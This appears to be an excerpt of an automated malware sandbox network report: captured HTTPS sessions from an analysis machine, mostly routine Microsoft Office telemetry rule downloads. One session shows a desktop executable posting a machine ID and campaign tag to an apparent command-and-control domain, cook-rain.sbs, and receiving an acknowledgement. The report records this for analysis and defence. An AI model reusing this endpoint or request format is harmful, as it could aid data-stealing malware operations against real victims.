                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:21 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:22 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                            x-ms-request-id: eb1ded04-b01e-0097-298c-3a4f33000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141722Z-1777c6cb754lvj6mhC1TEBke940000000b8000000000drnm
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            33192.168.2.64974413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:21 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:22 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                            x-ms-request-id: bdf962e5-c01e-0066-1b8c-3aa1ec000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141722Z-178bfbc474bbcwv4hC1NYCypys00000001h0000000002104
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            34192.168.2.64974513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:21 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:22 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                            x-ms-request-id: a1d80e42-301e-0096-338c-3ae71d000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141722Z-178bfbc474bpnd5vhC1NYC4vr400000001g000000000m4ky
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            35192.168.2.64974213.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:21 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:22 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                            x-ms-request-id: 561f43d7-f01e-0096-2f75-3b10ef000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141722Z-178bfbc474bxkclvhC1NYC69g400000001h000000000aues
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            36192.168.2.64974613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:21 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:22 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                            x-ms-request-id: b82db720-b01e-0053-528c-3acdf8000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141722Z-1777c6cb754whff4hC1TEBcd6c00000009x0000000005qky
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:22 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            37192.168.2.649748188.114.97.34434784C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:23 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=3Q3WWOFZU4ERF
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 1209
                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                            2024-11-21 14:17:23 UTC1209OUTData Raw: 2d 2d 33 51 33 57 57 4f 46 5a 55 34 45 52 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 35 34 32 45 37 33 34 39 32 46 45 32 41 43 34 41 46 46 35 41 44 45 43 39 45 36 42 44 37 37 0d 0a 2d 2d 33 51 33 57 57 4f 46 5a 55 34 45 52 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 51 33 57 57 4f 46 5a 55 34 45 52 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 33 51 33 57 57
                                                                                                                                                                                                            Data Ascii: --3Q3WWOFZU4ERFContent-Disposition: form-data; name="hwid"12542E73492FE2AC4AFF5ADEC9E6BD77--3Q3WWOFZU4ERFContent-Disposition: form-data; name="pid"1--3Q3WWOFZU4ERFContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--3Q3WW
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC991INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:23 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=rrk48dkkhrp82vb09338hua600; expires=Mon, 17-Mar-2025 08:04:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CKyVYp%2BjJZpfsp7VCshVJc0a2C2cbzhXcGrlrWrj3HU2LlUchGEpadLu%2B2XwQ%2F41W%2BS4gI%2FcgoPgqDJmew%2BHIoWsrX%2B1F%2Fiym7FeuLPjSn2g8lxPNL8kQhe43O77gxUx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e614d929a38c340-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1592&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=2118&delivery_rate=1677197&cwnd=144&unsent_bytes=0&cid=5b3e17c52d0e4744&ts=747&x=0"
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            38192.168.2.64974720.234.120.54443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:23 UTC603OUTGET /v1/a/impression?CID=128000000001615609&region=CH&lang=EN-CH%2CEN-GB&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.19041.1023&mo=&cap=&EID=&&PID=426081542&UIT=M-&TargetID=1&AN=1868311687&PG=PC000P0FR5.0000000IRU&REQASID=F40D71FD2D2F41BCA7C5C4D26E91B507&UNID=338389&ASID=b4854a4670964a30867ebc7644e57121&&DS_EVTID=F40D71FD2D2F41BCA7C5C4D26E91B507&DEVOSVER=10.0.19045.2006&REQT=20241121T141705&TIME=20241121T141710Z&ARCRAS=&CLR=CDM HTTP/1.1
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                                            Host: ris.api.iris.microsoft.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC183INHTTP/1.1 204 No Content
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                            request-id: 96253900-5529-481d-b9a5-8ae11b71d623
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:23 GMT
                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            39192.168.2.64974913.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:24 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 469
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                            x-ms-request-id: 63e0f5a8-701e-0032-207a-3ba540000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141724Z-1777c6cb754rz2pghC1TEBghen0000000b2g00000000d93x
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            40192.168.2.64975213.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:24 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 464
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                            x-ms-request-id: 899f8b05-e01e-0003-4ca0-3b0fa8000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141724Z-r1d97b99577xdmfxhC1TEBqbhg00000001zg00000000kngh
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            41192.168.2.64975013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:24 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                            x-ms-request-id: 9bf3f441-f01e-003f-246b-3bd19d000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141724Z-178bfbc474btrnf9hC1NYCb80g00000001q000000000kb1e
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
